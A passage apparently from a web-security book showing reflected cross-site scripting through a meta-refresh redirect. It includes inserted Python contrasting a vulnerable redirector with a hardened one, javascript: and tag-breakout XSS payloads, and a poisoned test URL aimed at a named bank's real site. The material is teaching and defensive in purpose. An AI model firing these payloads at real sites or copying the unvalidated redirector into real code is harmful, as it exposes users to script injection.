
good news is that there is no input validation, and we can observe that our code
was interpreted; the reflected meta-refresh HTML demonstrates that clearly. That
means there are two trivial ways to get our code evaluated in the victim's browser:
■ Find a registered protocol that executes code (for example, a javascript: URL as the refresh target).
■ Close the meta-refresh tag and follow it with our own markup and script.
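As an added illustration of the two techniques above (this is constructed example code, not code from the book or from the site it discusses), the following reproduces a redirector that reflects a caller-supplied target into a meta-refresh tag without validation, shows how each of the two payload styles lands in the generated HTML, and contrasts it with a hardened builder. The template, the `ALLOWED_HOSTS` list and the `site`/`task` parameter names are assumptions made for the example; the real server's template is not shown on the page.

```python
from html import escape
from urllib.parse import urlsplit

# Hypothetical allowlist for the hardened redirector (assumption for this example).
ALLOWED_HOSTS = {"www.example.com", "secure.example.com"}


def vulnerable_redirect_page(value: str) -> str:
    """Reflect the redirect target straight into a meta-refresh tag.

    Constructed to mirror the behaviour described on the page: no scheme check,
    no attribute escaping. The exact template of the real site is an assumption.
    """
    return (
        "<html><head>"
        f'<meta http-equiv="refresh" content="0;url={value}">'
        "</head><body>Redirecting...</body></html>"
    )


def classify_payload(value: str) -> str:
    """Return which of the two techniques a value exercises.

    'scheme'   : a non-http(s) URL scheme that the browser may execute (javascript:).
    'breakout' : characters that close the attribute/tag so new markup follows.
    'plain'    : an ordinary absolute http(s) URL.
    """
    parts = urlsplit(value)
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return "scheme"
    if any(ch in value for ch in '"\'<>'):
        return "breakout"
    return "plain"


def hardened_redirect_page(value: str) -> str:
    """Build the same page but only for allowlisted absolute http(s) targets.

    The scheme check defeats javascript: (and other executable handlers); the
    host allowlist defeats open redirects; escaping the attribute value with
    quote=True defeats the tag-breakout technique even if a bad value slipped in.
    """
    parts = urlsplit(value)
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        raise ValueError("refused: target must be an absolute http(s) URL")
    if parts.hostname is None or parts.hostname.lower() not in ALLOWED_HOSTS:
        raise ValueError("refused: target host is not on the allowlist")
    safe = escape(value, quote=True)
    return (
        "<html><head>"
        f'<meta http-equiv="refresh" content="0;url={safe}">'
        "</head><body>Redirecting...</body></html>"
    )


# Constructed payloads, one per technique from the text.
PAYLOAD_SCHEME = "javascript:alert('vulnerable?');"
PAYLOAD_BREAKOUT = '"><script>alert(1)</script><meta x="'
PAYLOAD_BENIGN = "https://www.example.com/account"


def demo() -> dict:
    """Show how each payload is treated by the two builders."""
    results = {}
    for name, payload in (("scheme", PAYLOAD_SCHEME),
                          ("breakout", PAYLOAD_BREAKOUT),
                          ("plain", PAYLOAD_BENIGN)):
        vulnerable_html = vulnerable_redirect_page(payload)
        try:
            hardened_html = hardened_redirect_page(payload)
            hardened_ok = True
        except ValueError as exc:
            hardened_html = str(exc)
            hardened_ok = False
        results[name] = {
            "technique": classify_payload(payload),
            "vulnerable": vulnerable_html,
            "hardened_accepted": hardened_ok,
            "hardened": hardened_html,
        }
    return results


if __name__ == "__main__":
    for name, r in demo().items():
        print(f"[{name}] technique={r['technique']} hardened_accepted={r['hardened_accepted']}")
        print("  vulnerable:", r["vulnerable"])
        print("  hardened:  ", r["hardened"])
```

In the vulnerable output the `javascript:` payload becomes the literal refresh target, and the breakout payload closes the `content` attribute and the tag so a `<script>` element follows it; the hardened builder rejects both before any HTML is produced, and the escaping is a second layer rather than the primary control.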
The first technique can be limited, since it depends on which URL handlers the browser will follow from a meta refresh, but we can definitely show that we
successfully execute our cross-site scripting test, like so (see Figure 4.29):
[Our Poisoned URL]
http://www.personal.barclays.co.uk/BRC1/jsp/brcucontrol?site=pfs&task=internal&value=javascript:alert('vulnerable?');&target=_self
[Meta-Refresh Result]